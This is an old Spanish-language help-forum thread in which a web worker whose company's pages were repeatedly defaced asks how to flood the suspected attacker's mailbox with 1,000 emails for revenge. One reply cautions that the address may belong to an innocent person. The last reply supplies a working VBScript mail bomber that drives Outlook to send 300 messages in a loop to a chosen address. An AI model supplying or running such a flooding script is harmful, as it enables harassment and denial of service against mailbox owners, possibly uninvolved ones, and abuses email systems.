Correo Electrónico - Help!! Venganza!!!

 
Vista:

Help!! Venganza!!!

Publicado por dragon (1 intervención) el 09/07/2001 22:03:59
hola!!! Resulta que en mi trabajo nos dedicamos a hacer paginas. El hosting nos lo presta una compañia gabacha. Van 4 veces que un chino sin quehacer nos hackea las paginas y nos pone basura en cada una de las paginas principales de la empresa (y nuestros clientes!!!) , y yo tengo que andarlas subiendo, lo cual me quita tiempo.

hemos hablado con los de Verio, y no dan solucion adecuada a nuestras peticiones, por lo que dejaremos el hosting y contrataremos a otro, pero 2 dias antes de mudarnos, ha vuelto a hacer su gracia, y lo unico que deseo es venganza!!! alguien puede decirme como mandarle al tipo 1000 correos iguales y rellenarle su buzon????

Este tipejo radica en el email siguiente:
[email protected]

El dragon.

Valora esta pregunta
Me gusta: Está pregunta es útil y esta claraNo me gusta: Está pregunta no esta clara o no es útil
0
Responder

RE:Help!! Venganza!!!

Publicado por Esteban (67 intervenciones) el 10/07/2001 14:32:39
¿Quien te dice que esa es su direccion de correo electrónico?. Seguramente, sea la de alguien a la que este tio quiera desviar la atencion.
No le mandaria ninguno realmente.
Valora esta respuesta
Me gusta: Está respuesta es útil y esta claraNo me gusta: Está respuesta no esta clara o no es útil
0
Comentar

RE:Help!! Venganza!!!

Publicado por jose (2 intervenciones) el 29/10/2001 23:32:03
'programa construido en VBScript
'nombre del programa: cualquiera.vbs
'aun no termino de construirlo pero igual puede enviar correo
'funciona con Microsoft Outlook, tienes que tener configurado para enviar correo
'tienes que tener instalado el windows scripting host "inicio>panel control >agregar 'o quitar programas >instalacion de windows > accesorios

dim out, correo,i,x ' defino variables
set out=WScript.createobject("Outlook.application") 'llamo a la aplicacion
correo="in@mail" 'asigno el correo que quiero bombardear

for i=1 to 300 ' cuantos correos quiero enviar
set a=out.createitem(0)
a.Recipients.add(correo)
a.Subject="mensaje"
a.send
x=x+1
next
Set out=Nothing

'sacale todos los comentarios
Valora esta respuesta
Me gusta: Está respuesta es útil y esta claraNo me gusta: Está respuesta no esta clara o no es útil
0
Comentar